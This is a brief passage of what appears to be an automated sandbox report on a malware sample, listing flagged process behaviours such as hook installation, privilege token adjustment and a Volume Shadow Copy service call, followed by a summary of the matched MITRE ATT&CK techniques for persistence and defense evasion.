- Suspicious use of SetWindowsHookEx
PID:760
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2632
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
Defense Evasion
- Direct Volume Access (1)
- Indicator Removal (4)
  - File Deletion (4)
- Modify Registry (2)